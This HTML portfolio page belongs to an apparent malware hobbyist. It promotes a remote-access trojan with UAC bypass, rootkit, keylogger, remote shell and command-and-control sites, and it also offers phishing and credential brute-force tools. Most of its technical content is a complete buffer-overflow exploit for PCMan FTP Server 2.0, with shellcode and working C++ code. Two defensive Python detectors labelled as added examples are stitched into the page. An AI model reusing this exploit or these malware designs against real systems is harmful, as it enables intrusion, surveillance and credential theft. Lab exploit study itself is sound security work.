<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="fonts.css">
<link rel="stylesheet" href="index.css">
<link rel="icon" href="Images/ElliotAldersonLogo.png">
<script src="js/jquery-3.4.1.min.js"></script>
<title>Elliot Alderson</title>
</head>
<body>
<nav>
<a href="index.html">Elliot</a>
<a href="#" id="About">About</a>
<a href="#" id="Projects">Projects</a>
<a target="_blank" href="https://github.com/ElliotAlderson51">GitHub</a>
<a href="#" id="HireMe">Hire Me</a>
</nav>
<div class="Elliot">
<div class="Logo">
<img src="Images/ElliotAldersonLogo.png">
</div>
<div class="Title">
<label>Elliot Alderson</label>
</div>
<div class="subTitle">
<label>Based in Israel</label>
</div>
<div class="Text">
<p>
Hello friend. Hello friend? That’s lame. Maybe I should give you a name? But that’s a slippery slope. You’re only in my head. We have to remember that. Shit. It’s actually happened. I’m talking to an imaginary person.
What I’m about to tell you is top secret. A conspiracy bigger than all of us. There’s a powerful group of people out there that are secretly running the world. I’m talking about the guys no one knows about. The guys that are invisible. The top one percent of the top one percent. The guys that play God without permission.
And now I think they’re following me.
</p>
</div>
<div class="AboutText">
<p>
Hi! As you can see, I really love the show Mr. Robot.
I'm from Israel, and I'm interested in Windows Internals and Malware Development, and I am currently
starting to study WiFi Hacking. In the future I'll build a device that has all of my tools! <br>
What have I studied before? Windows Internals, Windows Drivers, Windows API, C++, C, Assembly, Web Development, Deep Understanding of Social Engineering,
Basic Arduino, Basic Linux, PHP and more... <br> <br>
<a target="_blank" href="https://bmc.link/ElliotAlderson">☕ Buy Me a Coffee</a> (:
</p>
</div>
<div class="HireMeText">
<p>
Hi! Do you want me to help you with something? I'm here for you! <br>
Soon I'll add a contact email; until then you can send me a message on GitHub! or <br> <br>
<a target="_blank" href="https://bmc.link/ElliotAlderson">☕ Buy Me a Coffee</a> (:
</p>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/BotProfile.png">
<a href="#" id="FsocietyRAT">Fsociety RAT</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/FsocietyPhishingToolMain.png">
<a href="#" id="PhishingTool">Fsociety Phishing Tool</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<video controls muted>
<source src="videos/BypassUAC_video.mp4" type="video/mp4">
</video>
<a href="#" id="BypassUAC">Auto/Manual UAC Bypass</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/RootkitWallpaper.jpg">
<a href="#" id="Rootkit">Kernel Rootkit for Windows 32bit</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/brute-force-attack.png">
<a href="#" id="BruteForce">Brute Force</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/BinaryExploitation.png">
<a href="#" id="BinaryExploitation">Binary Exploitation</a>
</div>
</div>
<div class="FsocietyRAT">
<h1>Fsociety RAT</h1>
<div class="Text">
<p>
It was really fun to make this project! This project has a lot of great features and a very good control website for the bots.
The final malware bypasses UAC, installs a rootkit on 32-bit systems, and uses obfuscated strings, an Anti-VM technique and Process Hollowing. It communicates with the control website using CURL (curl is preinstalled in every Windows!).
</p> <br> <hr> <br>
<h2>RAT</h2>
<h3>Malware Persistence Techniques</h3> <br>
✔️ The malware hides a DLL (used to bypass UAC) and a rootkit in new sections. <br>
✔️ Bypasses UAC using UAC hijacking on the program ComputerDefaults.exe in a "Windows " folder. <br>
✔️ Creates a task for the malware in Task Scheduler in the path "Microsoft\\Windows\\Security" with high privileges. <br>
✔️ If the system is 32-bit, installs and starts the rootkit. <br>
✔️ If the system is 64-bit, the malware starts Process Hollowing. <br> <br>
<h3>Malware Attacks</h3>
<p>The malware communicates with a control website. These are the current attacks:</p> <br>
✔️ Screenshot <br>
✔️ Task Scheduler <br>
✔️ Remote Shell <br>
✔️ File Manager <br>
✔️ File Explorer <br>
✔️ Keylogger <br>
✔️ Client Info <br> <br>
<h3>Website Control Images</h3>
<p><i>Main website control</i> - lists the clients and shows info about them</p>
<img src="Images/FsocietyRat.png">
<p><i>Victim profile page</i> - contains the attack options</p>
<img src="Images/BotProfile.png">
<br> <hr> <br>
<h2>Rootkit</h2>
<p>The Rootkit is for 32-bit systems. <a href="https://github.com/ElliotAlderson51/Kernel-Rootkit-32Bit">Click to see the Rootkit project on GitHub</a></p>
<h3>What can the Rootkit do?</h3>
<h4>Hook the SSDT</h4> <br>
✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute) <br>
✔️ Hide Process <br>
✔️ Protect Process, Thread <br>
✔️ Protect Registry Keys (Open\Create\Delete\Set) <br>
✔️ Bypass privilege checks <br>
<br> <hr> <br>
<h2>DLL - Bypass UAC</h2>
<p>Creates a DLL that ComputerDefaults will load through DLL hijacking, to start the malware with high privileges.</p>
<p><a href="https://github.com/ElliotAlderson51/Bypass-UAC">Click to see the BypassUAC project on GitHub</a></p> <br>
<hr>
<h2>section_injector</h2>
<p>This project injects a file into a new section in another file.</p>
<pre> Injector.exe "section name" "target" "file"</pre>
<br> <hr> <br>
<h2>Websites</h2>
<h3>Fsociety Control Website</h3>
<p>This is the Control Website that the malware communicates with to get the commands to execute.</p>
<h3>Fsociety Redirect Website</h3>
<p>This website's URL is hardcoded in the malware code; the malware gets the Control Website URL from this website. <br>
I created this website so that if there is a problem with the Control Website you can just upload the Control Website again and change the URL in this website. </p>
<br> <hr> <br>
<h2>Sub Projects</h2>
<p>These solutions helped me build the final malware.</p> <br>
<h3>Initialize RAT</h3>
<p>This automated the build of the final malware.</p> <br>
✔️ UPX the DLL file <br>
✔️ Inject the DLL and the Rootkit to new sections. <br> <br>
<h3>Encoding_Decoding</h3>
<p>This helps me to obfuscate the strings in the malware.</p>
<br> <hr> <br>
<h2>TODO</h2> <br>
<p> <b>*</b> Obfuscate Imports</p>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only one responsible for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="BypassUAC">
<h1>BypassUAC</h1>
<h2>Bypassing Windows 10 with mock folder and DLL Hijacking </h2> <br>
<div class="Text">
<p><b>Hey, I made two projects to bypass UAC:</b></p> <br>
<p><b>1.</b> Manual</p> <br>
<p><b>2.</b> Auto</p> <br>
<p>You will find in each folder (Manual/Auto) a README.md file with an explanation! <br> </p> <br>
<h3>How does it work?</h3>
<p>The program creates a <i>"Windows "</i> folder, and Windows will think that this is the original <i>"Windows"</i> folder. <br>
The program copies <i>"ComputerDefaults.exe"</i> into <i>"Windows /System32"</i> and then extracts the DLL from the PE section into <i>"Windows /System32"</i> with the name <i>"Secur32.dll"</i>. <br>
It then starts ComputerDefaults.exe, which performs the DLL Hijacking and bypasses UAC. The DLL will start whatever you want: it can be a CMD or the program that does all of this automatically. </p> <br>
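<p>Added example, not part of the Bypass-UAC project: a Python check a defender could run over process-creation and image-load telemetry to flag the <i>"Windows "</i> mock folder described above. It generalizes slightly to any path component that ends in a space or dot; the event field names (<i>image</i>, <i>module</i>) and the sample events are constructed for illustration.</p>

```python
# Added example: flag "mock trusted directory" paths in process telemetry.
# Heuristic: a directory name ending in a space or dot is unusual in
# legitimate software, and "Windows " under the drive root imitates the
# real Windows directory.

TRUSTED_ROOT = "windows"


def components(path):
    """Split a Windows path into its components, dropping the drive letter."""
    p = path.replace("/", "\\")
    if p.startswith("\\\\?\\"):      # extended-length prefix (\\?\)
        p = p[4:]
    parts = [c for c in p.split("\\") if c]
    if parts and len(parts[0]) == 2 and parts[0][1] == ":":
        parts = parts[1:]
    return parts


def classify(path):
    """Return None, 'mock-windows-dir' or 'padded-component' for one path."""
    parts = components(path)
    padded = [c for c in parts if c not in (".", "..") and c != c.rstrip(" .")]
    if not padded:
        return None
    if parts[0] in padded and parts[0].rstrip(" .").lower() == TRUSTED_ROOT:
        return "mock-windows-dir"
    return "padded-component"


def scan(events):
    """Check the process image and any loaded module path of each event."""
    findings = []
    for index, event in enumerate(events):
        for field in ("image", "module"):
            verdict = classify(event[field]) if event.get(field) else None
            if verdict:
                findings.append((index, field, verdict))
    return findings


# Constructed sample events (field names are assumptions, not a real schema).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\ComputerDefaults.exe"},
    {"image": r"C:\Windows \System32\ComputerDefaults.exe"},
    {"image": r"C:\Windows \System32\ComputerDefaults.exe",
     "module": "\\\\?\\C:\\Windows \\System32\\Secur32.dll"},
    {"image": r"C:\Users\demo\My Docs \tool.exe"},
    {"image": r"C:\Program Files\App\app.exe",
     "module": r"C:\Windows\System32\secur32.dll"},
]

if __name__ == "__main__":
    for index, field, verdict in scan(SAMPLE_EVENTS):
        print(index, field, verdict, repr(SAMPLE_EVENTS[index][field]))
```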
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only one responsible for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="Rootkit">
<h1>Kernel Rootkit</h1>
<div class="Text">
<h2>Introduction</h2>
<p>Hey, after I read the books:</p> <br>
"<a href="https://www.amazon.com/Windows-Kernel-Programming-Pavel-Yosifovich/dp/1977593372">Windows Kernel Programming</a>" by Pavel Yosifovich <br>
"<a href="https://www.amazon.com/Rootkit-Arsenal-Escape-Evasion-Corners/dp/144962636X">The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System 2nd Edition</a>" by Bill Blunden <br>
<br>
<p>
I decided to create a Kernel Rootkit for 32-bit systems. <br>
Now I'll start learning how to create a Kernel Rootkit for 64-bit! <br>
Enjoy. <br>
</p>
<h2>What can the Rootkit do?</h2>
<h3>Hook the SSDT</h3>
✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute) <br>
✔️ Hide Process <br>
✔️ Protect Process, Thread <br>
✔️ Protect Registry Keys (Open\Create\Delete\Set) <br>
✔️ Bypass privilege checks <br>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only one responsible for your actions! <b> Happy Hacking (; </b> </p>
<br> <br> <br>
</div>
</div>
<div class="PhishingTool">
<h1>Fsociety Phishing Tool</h1>
<div class="Text">
<p>I built this tool 2 years ago using Python. On the <a href="https://github.com/ElliotAlderson51/Fsociety-Phishing-Tool" target="_blank">project GitHub page</a> you can find which websites you can spoof.</p>
<a href="Images/FsocietyPhishingToolMain.png" target="_blank"> <img src="Images/FsocietyPhishingToolMain.png"> </a>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only one responsible for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="BruteForce">
<h1>Brute Force Attack</h1>
<div class="Text">
<p>Like the <a href="#" id="go_to_FsocietyPhishingTool_id">Fsociety Phishing Tool</a>, I built this tool 2 years ago using Python. <br> This project is on GitHub <a href="https://github.com/ElliotAlderson51/Brute-Force" target="_blank">here</a>
and has the following Brute Force features:</p><br> <br>
<p>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/Email/src/BruteFurce_Email.py" target="_blank">Gmail</a><br> <br>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/SSH/BruteForce%20SSH%201.0/SSH_BruteForce.py" target="_blank">SSH</a> <br> <br>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/Wifi/BruteForce%20Wifi%201.0/BF_Wifi.py" target="_blank">WIFI</a> <br> <br>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/Zip/src/ZipCracker.py" target="_blank">Zip</a> <br>
</p>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only one responsible for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="beGallery">
<div class="project">
<img src="Images/GithubWallpaper.jpg">
<a target="_blank" href="https://github.com/ElliotAlderson51/Exploit-Writeups">Exploit Writeups - GitHub</a>
</div>
</div>
<div class="beGallery">
<div class="project">
<img src="Images/BinaryExploitation.png">
<a href="#" id="be1">PCMAN's FTP Server 2.0</a>
</div>
</div>
<div class="be1">
<div class="Text">
<p>Hey, this is my first Exploit Writeup post, for practicing Binary Exploitation on Windows! I made myself a folder with a lot of vulnerable software, each with
a random name like 48504, and then I choose one randomly and start investigating the program and exploiting it.
<br><br>
File: <a href="binary_exploitation_files/photos/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z" target="_blank">9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z</a>
</p>
<hr>
<h1>Challenge 1: 45745</h1>
<p>
After extracting it, I can see that the exe file name is PCManFTPD2. From the name of the file I can assume that this program is an FTP server or just uses the FTP protocol.
<br><br>
When I run the program I can confirm that this program is an FTP server.
All of the text in the server is in Chinese, so it's kind of hard to understand the program.
<br><br>
"PCMan’s FTP Server 2.0 – Copyright © 2005" <br> <br>
After playing around with the server a little, I can see that it accepts USER anonymous and PASS anonymous to log in. <br>
</p>
<br> <h2>Fuzzing</h2>
<p>
I tried to fuzz the USER option in the server using the SPIKE tool on Kali Linux, with the following command: <br> <br>
<pre>  generic_send_tcp 192.168.106.138 21 spike.spk 0 0</pre>
</p>
<p>
<br><br>
The spike.spk file will look like this: <br>
</p>
<pre>
s_readline();
s_string("USER ");
s_string_variable("0");</pre>
<br>
<p>
And the result is: <br> <br>
<img src="binary_exploitation_files/photos/PCMAN FTP crashed.png"> <br> <br>
We successfully crashed the program!!
</p>
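<p>Added example, not part of the original writeup: a Python check for an FTP proxy or log pipeline that flags the condition the fuzzing exposed, a control-channel command whose argument is far longer than any real user name. It goes beyond USER to any command; the 128-byte limit is an assumed site policy and the sample stream is constructed.</p>

```python
# Added example: screen FTP control-channel bytes for abnormal command arguments.
MAX_ARG_LEN = 128                          # assumed policy, not from the page or RFC 959
PRINTABLE = frozenset(range(0x20, 0x7F))   # printable ASCII byte values


def iter_lines(stream):
    """Yield (line, terminated) pairs; commands end with CRLF (bare LF tolerated)."""
    *complete, tail = stream.split(b"\n")
    for line in complete:
        yield line.rstrip(b"\r"), True
    if tail:                               # the sender never terminated this command
        yield tail, False


def inspect_control_stream(stream, max_arg_len=MAX_ARG_LEN):
    """Return (line_no, verb, arg_len, reasons) for every suspicious command."""
    findings = []
    for number, (line, terminated) in enumerate(iter_lines(stream), start=1):
        verb, _, arg = line.partition(b" ")
        reasons = []
        if len(arg) > max_arg_len:
            reasons.append("oversized-argument")
        if any(byte not in PRINTABLE for byte in arg):
            reasons.append("non-printable-bytes")
        if reasons and not terminated:
            reasons.append("unterminated")
        if reasons:
            name = verb.upper().decode("ascii", "replace")
            findings.append((number, name, len(arg), reasons))
    return findings


# Constructed sample: a normal anonymous login followed by two abnormal commands.
SAMPLE_STREAM = (
    b"USER anonymous\r\n"
    b"PASS anonymous\r\n"
    b"user " + b"A" * 2100 + b"\x90\x90\xcc" + b"\r\n"
    + b"USER " + b"B" * 300
)

if __name__ == "__main__":
    for finding in inspect_control_stream(SAMPLE_STREAM):
        print(finding)
```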
<br><h2>Finding the EIP Offset</h2><br>
<p>
Let's create a pattern using the following command in Kali Linux:
</p>
<pre> msf-pattern_create -l 5000</pre> <br>
<p>
Now we can start writing our exploit. I'll write my exploit in C++ in Visual Studio.
</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
EIP offset:
badchars:
*/
std::string pattern = "…";
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
std::string exploit = pattern;
// Start the exploit
c.Send(exploit);
return 0;
}
</pre><br>
<p>
After we run this program you can see that the FTP server crashed, and the EIP has been overwritten with the value 43396F43. <br><br>
Using the following command we can get the offset of the EIP: <br> <br>
<img src="binary_exploitation_files/photos/PCMAN EIP offset.png"> <br> <br>
And we can see that the offset is 2007
</p>
<br><h2>Overwrite the EIP</h2><br>
<p>
Let's see if we can overwrite the EIP with "BBBB":
</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
EIP offset: 43396F43 -> [*] Exact match at offset 2007
badchars:
*/
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
// Generate A's
int offset = 2007;
std::string A = MultipleString("A", offset);
// Generate padding
std::string padding = MultipleString("D", 5000 - offset - 4);
std::string exploit = A + "BBBB" + padding;
// Start the exploit
c.Send(exploit);
return 0;
}
</pre>
<p>
Run the program in Immunity Debugger and see that it works! The EIP is now "42424242". <br> We successfully overwrote the EIP! <br>
</p>
<br><h2>Find JMP ESP</h2><br>
<p>
The next step in our exploit will be the jmp to our shellcode. <br>
Using mona we can search for a JMP ESP, I use the following command in Immunity Debugger:
</p>
<pre> !mona jmp -r ESP</pre>
<p>It seems that mona did not find a valid JMP ESP in a module without ASLR, DEP, SafeSEH... I'll keep this first exploit simple and just search for a JMP ESP in KERNEL32.dll:</p>
<pre> !mona jmp -r ESP -m KERNEL32.dll</pre>
<p>And the result is: </p>
<pre>
Address = 7667E8F3
Message = 0x7667e8f3 (b+0x0003e8f3) : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)</pre>
<p>Current Exploit:</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
----------------------------------------------
EIP offset: 43396F43 -> [*] Exact match at offset 2007
JMP ESP:
Address= 7667E8F3 -> "\xf3\xe8\x67\x76"
Message= 0x7667e8f3 (b+0x0003e8f3) : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
badchars:
*/
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
// Generate A's
int offset = 2007;
std::string A = MultipleString("A", offset);
// Generate padding
std::string padding = MultipleString("D", 5000 - offset - 4);
std::string exploit = A + "\xf3\xe8\x67\x76" + padding;
// Start the exploit
c.Send(exploit);
return 0;
}
</pre>
<br><h2>Find Bad Characters</h2><br>
<p>
This is not a tutorial, so I just generated a badchars list and will tell you what I found:
</p>
<img src="binary_exploitation_files/photos/Bad Characters.png">
<p>The Bad Characters that I found are the following: </p>
<pre> "\x0a\x0d"</pre>
<br><h2>Calculator Shellcode:</h2><br>
<p>
I will use this calculator shellcode for our exploit:
</p>
<pre>
char calc_shellcode[] =
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7"; </pre>
<br><h2>Final Exploit</h2><br>
<p>
The final exploit is:
</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
----------------------------------------------
EIP offset: 43396F43 -> [*] Exact match at offset 2007
JMP ESP:
Address= 7667E8F3 -> "\xf3\xe8\x67\x76"
Message= 0x7667e8f3 (b+0x0003e8f3) : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
badchars: "\x0a\x0d"
*/
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
// Generate A's
int offset = 2007;
std::string A = MultipleString("A", offset);
// Generate nopsled
std::string nops = MultipleString("\x90", 20);
// Shellcode
char calc_shellcode[] =
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7";
// Generate padding
std::string padding = MultipleString("D", 5000 - offset - 4 - nops.length() - (sizeof(calc_shellcode) / sizeof(calc_shellcode[0])));
std::string exploit = A + "\xf3\xe8\x67\x76" + nops + calc_shellcode + padding;
// Start the exploit
c.Send(exploit);
return 0;
}</pre>
<br><p>Thanks for reading!</p> <br> <br>
</div>
</div>
<script>
$("#About").click(function()
{
$(".Elliot").show();
$(".Elliot .Text").hide();
$(".Elliot .HireMeText").hide();
$(".ProjectsGallery").hide();
$(".Elliot .AboutText").show();
$(".be1").hide();
});
$("#HireMe").click(function()
{
$(".Elliot .Text").hide();
$(".Elliot .AboutText").hide();
$(".ProjectsGallery").hide();
$(".Elliot .HireMeText").show();
$(".be1").hide();
});
$("#Projects").click(function()
{
$(".Elliot").hide();
$(".Elliot .AboutText").hide();
$(".Elliot .HireMeText").hide();
$(".FsocietyRAT").hide();
$(".BypassUAC").hide();
$(".Rootkit").hide();
$(".PhishingTool").hide();
$(".BruteForce").hide();
$(".be1").hide();
$(".ProjectsGallery").show();
});
$("#FsocietyRAT").click(function()
{
$(".ProjectsGallery").hide();
$(".FsocietyRAT").show();
});
$("#BypassUAC").click(function()
{
$(".ProjectsGallery").hide();
$(".BypassUAC").show();
});
$("#Rootkit").click(function()
{
$(".ProjectsGallery").hide();
$(".Rootkit").show();
});
$("#PhishingTool").click(function()
{
$(".ProjectsGallery").hide();
$(".PhishingTool").show();
});
$("#BruteForce").click(function()
{
$(".ProjectsGallery").hide();
$(".BruteForce").show();
});
$("#BinaryExploitation").click(function()
{
$(".ProjectsGallery").hide();
$(".beGallery").show();
});
$("#be1").click(function()
{
$(".beGallery").hide();
$(".be1").show();
});
</script>
</body>
</html>